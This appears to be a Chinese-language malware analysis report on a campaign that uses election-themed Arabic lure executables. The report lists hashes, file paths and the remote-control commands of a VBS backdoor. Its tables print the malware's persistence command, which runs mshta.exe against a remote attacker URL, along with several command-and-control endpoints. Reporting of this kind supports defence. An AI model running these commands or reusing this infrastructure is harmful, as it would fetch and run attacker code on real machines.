
图:诱饵文档1

图:诱饵文档2

图:攻击流程
| 文件名 | اجتماع لجنة الانتخابات – إقليم الشمال .exe |
| 中文翻译 | 选举委员会会议-北领地.exe |
| MD5 | 6E62856152EB198B457487E1EED94D76 |
| 文件大小 | 396.71KB(406234 bytes) |
| 文件格式 | Win32 EXE |
| 创建时间 | 2019-4-27 |
| VT首次上传时间 | 2019-11-05 |
| VT检测结果 | 37 / 70 |
| 涉及URL | http://192.119.111.4/xx/dv |
| 内含诱饵文档名 | GSHword.docx |
表:自解压文件1信息

图:自解压文件1
| 文件名 | المجدلاني يشكك بجدية الرئيس عباس بشأن الانتخابات الرئاسية.exe |
| 中文翻译 | Majdalani严重怀疑阿巴斯总统关于总统选举.exe |
| MD5 | 4FA306739FD3ECC75B0EE202A614061D |
| 文件大小 | 389.28KB (398627bytes) |
| 文件格式 | Win32 EXE |
| 创建时间 | 2019-4-27 |
| VT首次上传时间 | 2019-11-07 |
| VT检测结果 | 27 / 70 |
| 涉及URL | http://192.119.111.4/xx/dv |
| 内含诱饵文档名 | wordwatan.docx |
表:自解压文件2信息

图:自解压文件2

图:自解压命令
| 文件名 | GSHword.docx |
| MD5 | D99F2923C81E703C6345D30BF0E15CD9 |
| 所处目录 | %temp% |
| VT检测结果 | 0 / 59 |
表:诱饵文档1:GSHword.docx的信息
| 文件名 | wordwatan.docx |
| MD5 | 7E55C6E273FE45336299A7AAA46D5A2B |
| 所处目录 | %temp% |
| VT检测结果 | 0 / 62 |
表:诱饵文档2:wordwatan.docx的信息
| 文件名 | HelPPane.lnk |
| MD5 | F4355A61D7AC60D3282A9A207A643589 |
| 目标属性 | C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv |
| 所处目录 | %appdata% \Microsoft\Windows\Start Menu\Programs\Startup |
| VT检测结果 | 样本无上报 |
表:HelPPane.lnk 信息

图:HelPPane.lnk的目标属性
| 来源 | http://192.119.111.4/xx/dv |
| MD5 | 7BCBE8CC5A05DF9FCEA4E7E52BD00D79 |
| 执行方式 | C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv |
| 涉及URL | http://192.119.111.4/xx/dv.zip |
表:dv.vbs 信息

图:dv.vbs脚本文件
| 文件名 | xxxx.tmp(xxxx表示随机命名) |
| MD5 | 9094DF33AA0D6B1DD4EFAF34E91A05C4 |
| 所处目录 | %temp% |
| 来源 | http://192.119.111.4/xx/dv.zip |
| 涉及URL | http://192.119.111.4/xx/f_Skoifa.vbs |
表:dv.zip.vbs 信息
| 文件名 | f_Skoifa.vbs |
| MD5 | FD5BA76F85C9746F7A326B954874F5A6 |
| 所处目录 | %USERPROFILE%\AppData\Local |
| 来源 | http://192.119.111.4/xx/f_Skoifa.vbs |
表:f_Skoifa.vbs 信息

图:下载f_Skoifa.vbs
| 文件名 | Help |
| 所处目录 | %USERPROFILE%\AppData\Roaming\Microsoft\Windows |
| 子文件 | HelpPane.lnk |
表:Help 信息

图:创建Help文件夹

图:更改注册表
| 文件名 | HelpPane.lnk |
| MD5 | 2818ECDE79CEDC1E181D7B69F14840A6 |
| 目标属性 | C:\Windows\System32\wscript.exe %USERPROFILE%\AppData\Local\f_Skoifa.vbs |
| 所处目录 | %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help |
| VT检测结果 | 样本无上报 |
表:HelpPane.lnk 信息

图:创建快捷方式文件

图:更改文件属性
| 文件名 | f_Skoifa.vbs |
| MD5 | FD5BA76F85C9746F7A326B954874F5A6 |
| 所处目录 | %USERPROFILE%\AppData\Local |
| 来源 | http://192.119.111.4/xx/f_Skoifa.vbs |
| 涉及URL | http://192.119.111.4:4587/is-ready http:// 192.119.111.4:4587 / is-enum-driver http:// 192.119.111.4:4587 / is-sending http:// 192.119.111.4:4587 / is-enum-faf http:// 192.119.111.4:4587 / is-enum-process |
表:_Skoifa.vbs 信息

图:f_Skoifa.vbs密文

图:f_Skoifa.vbs明文

图:发送信息和接收远控指令

图:远控指令

图:远控指令名excecute

图:远控指令名send

图:远控指令名send对应的操作函数

图:远控指令名recv

图:远控指令名enum-driver

图:远控指令名enum-driver对应的操作函数

图:远控指令名enum-faf

图:远控命令enum-faf对应的操作函数

图:远控指令名enum-process

图:远控指令名enum-process对应的函数操作

图:远控指令名delete

图:远控指令名exit-process

图:远控指令名exit-process对应的操作函数